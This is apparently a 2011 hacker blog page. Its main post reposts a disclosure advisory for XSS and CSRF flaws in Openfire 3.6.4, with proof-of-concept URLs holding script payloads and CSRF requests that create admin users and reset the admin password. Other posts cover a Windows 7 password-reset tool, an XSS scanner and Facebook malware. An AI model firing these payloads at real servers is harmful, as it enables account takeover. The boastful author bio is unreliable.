hahahah amol hacked ur ip address

Sign by Danasoft - For Backgrounds and Layouts

Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E in Bangalore. A cyber Security Professional, Hacker, Designer, Programmer. Keen interest in hacking and network security and he developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various International conferences like NullCon GOA, c0c0n, ClubHack, Defcon , SecurityByte, ICFoCS, OWASP, etc.. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows stuffs on C, C++, C# , JAVA (SCJP), .NET , and PHP. Additionally he knows few hardware languages like HDL, VHDL, Verilog, Embedded Micro controller Programming. He has been featured on google hall of fame. Amol was named a "India's top 10 hacker" by google. "World's top 50 hacking blog" by google.

Daily Page Views

Saturday, February 19, 2011

Multiple XSS and XSRF issues in Openfire 3.6.4

I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
http://www.securityfocus.com/bid/45682
http://secunia.com/advisories/42799
http://packetstormsecurity.org/files/author/8144/
http://www.exploit-db.com/exploits/15918/

The following is the condensed disclosure document for the vulnerabilities.:
Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
--------------------------------------------------------------------

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS and CSRF
Fixes Available: None
--------------------------------------------------------------------

Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update recevied. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 January 2011
05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
--------------------------------------------------------------------

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
--------------------------------------------------------------------

Affected Files/Locations/Modules:
XSS:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

CSRF:
user-create.jsp
user-password.jsp
user-delete.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp

---------------------------------------------------------------------

Vulnerability Details:
User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

Since the vulnerabilities exisit in the administrative module, a sucessful attack could cause a complete compromise of the entire application.

An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
----------------------------------------------------------------------

Proof of Concept:
Persistent XSS:
http://target-url/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

http://target-url/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

http://target-url/user-create.jsp?username=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?name=test"><script>alert('xss')</script>
http://target-url/user-create.jsp?email=test"><script>alert('xss')</script>

http://target-url/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

http://target-url/user-roster-add.jsp?username=test<script>alert('xss')</script>
http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

http://target-url/user-roster.jsp?username=test<script>alert(document.cookie)</script>
http://target-url/user-lockout.jsp?username=test<script>alert('xss')</script>

http://target-url/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

http://target-url/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

http://target-url/group-delete.jsp?group=<script>alert('xss')</script>


http://target-url/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

http://target-url/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions


Stored XSS:
http://target-url/group-create.jsp
http://target-url/group-summary.jsp
Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
Group Name: Test<script>alert("xss")</script>
Description: Test<script>alert("xss")</script>
Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.


CSRF:
For the following links, create html pages with image tags with scr= the following links and ask the user to view these pages. If a user is logged into Openfire's admin console and the HTML pages are viewed then the respective functions are called:
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User>
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password>
http://target-url/user-delete.jsp?username=tester&delete=Delete+User
http://target-url/user-delete.jsp?username=tester&delete=Delete+User>
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group>
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add>
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update>

Tuesday, February 1, 2011

Free XSS flaws detection service..!!

Cross-site scripting (XSS) errors are responsible for more than half of all web application vulnerabilities1. So, in this age of accountability and expectations for secure, high quality software, what’s being done about it?

Veracode announced their Free XSS Detection Service which empowers global developers and security professionals to quickly and easily identify dangerous and costly XSS vulnerabilities, while offering remediation recommendations to produce higher security web applications.

OWASP includes XSS on its list of the Top 10 most dangerous software risks, and despite the high prevalence, Veracode is certain that XSS vulnerabilities can be easily eliminated once detected.

Veracode Free XSS Detection Service removes perceived complexity from the detection process, and with access to proper education and training, developers can avoid introducing the flaws into software in the first place.

According to OWASP, XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser that can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Here’s how the Veracode Free XSS Detection Service works:

    * Sign up for a Free XSS Detection Service account
    * Users submit one Java application, free of charge
    * The Veracode platform will search for XSS errors and produce a detailed report with location and remediation information
    * Participants will also receive complimentary access to Veracode’s dedicated XSS eLearning courses.

“At Veracode, we see thousands — sometimes tens of thousands — of XSS vulnerabilities a week. Many are those we describe as ’trivial’ and can be fixed with a single line of code. Some of our customers upload a new build the following day; others never do. Motivation is clearly a factor,” said Chris Eng, senior director of security research, Veracode.

“Think about the XSS vulnerabilities that hit highly visible websites such as Facebook, Twitter, MySpace and others. Sometimes those companies push XSS fixes to production in a matter of hours. Are their developers really that much better? Of course not. The difference is how seriously the business takes it. When they believe it’s important, you can bet it gets fixed.”

@mol

New malware strains wreaking havoc on Facebook..!!






PandaLabs announced the discovery of security exploits via popular social media sites Facebook and Twitter. In the last several days, two new malware strains have been wreaking havoc on Facebook users.

The first, Asprox.N, is a Trojan delivered via email informing users their Facebook account is being used to distribute spam and that, for security reasons, the login credentials have been changed.

The email includes a fake Word document attachment, supposedly containing the new password, with an unusual icon and the filename Facebook_details.exe.

Deceiving victims by opening a .doc file upon opening the attachment, this file is really a Trojan that downloads another file designed to open all available ports, connecting to mail service providers in an attempt to spam as many users as possible.

The second new malware strain, Lolbot.Q, is distributed across instant messaging applications such as AIM or Yahoo!, with a message displaying a malicious link.

Clicking the link downloads a worm designed to hijack Facebook accounts, blocking users' access while informing that the account has been suspended.

To "reactivate" their account, users are asked to complete a questionnaire, promising prizes such as laptops and iPads. After several questions, users are asked to subscribe and enter their cell phone number, which is in turn charged a fee of $11.60 per week.

Victims can restore access to their Facebook account only once they subscribe to the service and receive a new password.

"Once again cybercriminals are using social engineering to trick victims and infect them with malware," said Luis Corrons, technical director of PandaLabs. "Given the increasing popularity of social media, it is no surprise that it is being exploited to lure victims."

Hack Windows 7 administrator password



There can be various conditions when you get struck as you have forgot the admin password account or you want to play upon with your friend. There are various tutorials available and various boot loader linux flavours available for cracking the password . But I have selected the most simple and small loader for you to work with.
Note that there is no way by which you can determine the old password but you can reset it with a new password.

Offline NT Password & Registry Editor

I have tested this software on all the current versions of windows 7 , windows vista and on windows server 2008 . The download is an iso image of the setup. Read the readme.txt file for more instructions of installing.

You can also make a bootable pendrive and boot from it.

Overview

  1. Get the machine to boot from CD.
  2. Load drivers (usually automatic, but possible to run manual select)
  3. Disk select, tell which disk contains the Windows system. Optionally you will have to load drivers.
  4. PATH select, where on the disk is the system?
  5. File select, which parts of registry to load, based on what you want to do.
  6. Password reset or other registry edit.
  7. Write back to disk (you will be asked)